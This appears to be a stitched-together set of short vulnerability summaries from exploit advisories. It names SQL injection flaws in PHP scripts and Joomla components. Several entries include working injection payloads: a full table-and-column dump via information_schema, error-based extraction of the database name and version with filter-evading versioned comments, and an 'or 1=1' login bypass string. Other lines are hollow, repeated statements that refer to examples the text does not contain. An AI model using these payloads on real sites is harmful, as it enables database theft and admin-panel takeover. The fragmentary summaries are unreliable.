The vulnerability allows an attacker to inject sql commands into the 'subcat' parameter of the show.php script. Proof of Concept: http://localhost/[PATH]/show.php?catid=1&subcat=[SQL] -1'+unIon(SELEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283929,0x28313029)--+-
The vulnerability allows an attacker to inject sql commands. An example of the exploit is provided in the text.
The vulnerability allows an attacker to access the user panel and administration panel by using a crafted username and password. The crafted username is 'anything' and the password is 'or 1=1 or ''='.
The vulnerability allows an attacker to inject sql commands into the vulnerable application.
The vulnerability allows the users to inject sql commands into the timeline.php and photos_of_you.php files.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?page=cat&cid=[SQL] 34'+/*!00000Procedure*/+/*!00000Analyse*/+(extractvalue(0,/*!00000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+-
The vulnerability allows an attacker to inject sql commands. An example of the exploit is provided in the proof of concept section.
The vulnerability allows an attacker to inject sql commands into the vulnerable application.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL] 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_flipwall&task=click&wallid=[SQL] 811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
Services By CQR